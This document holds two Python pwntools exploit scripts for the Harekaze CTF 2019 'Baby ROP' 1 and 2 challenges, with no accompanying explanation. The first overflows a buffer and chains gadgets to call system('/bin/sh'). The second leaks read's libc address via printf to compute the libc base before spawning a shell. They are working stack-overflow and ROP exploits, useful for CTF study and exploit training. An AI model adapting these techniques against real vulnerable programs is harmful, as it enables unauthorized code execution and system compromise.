Harekaze CTF 2019 Baby ROP 1,2

bayrop1_exploit.py

from pwn import *
  
p = process("./babyrop1")

system = 0x400490
binsh = 0x601048
pr = 0x400683
ret = 0x400479

payload = "A"*(0x10+8)
payload += p64(pr)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)

p.sendlineafter("? ",payload)
p.interactive()

babyrop2_exploit.py

from pwn import *

p = process("./babyrop2")

e = ELF("./babyrop2")
l = e.libc

pr = 0x400733
ret = 0x4004d1
one_gadget = [0x4f2c5,0x4f322,0x10a38c]

payload = "A"*(0x20+8)
payload += p64(pr)
payload += p64(e.got["read"])
payload += p64(ret)
payload += p64(e.plt['printf'])
payload += p64(ret)
payload += p64(0x400636)

p.sendlineafter("? ",payload)
p.recvuntil("!\n")
read_addr =  u64(p.recv(6).ljust(8,"\x00"))
libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']
binsh = libc_base + list(l.search("/bin/sh"))[0]

payload2 = "A"*(0x20+8)
payload2 += p64(ret)
payload2 += p64(pr)
payload2 += p64(binsh)
payload2 += p64(system_addr)
p.recvuntil("? ")
p.sendline(payload2)
p.interactive()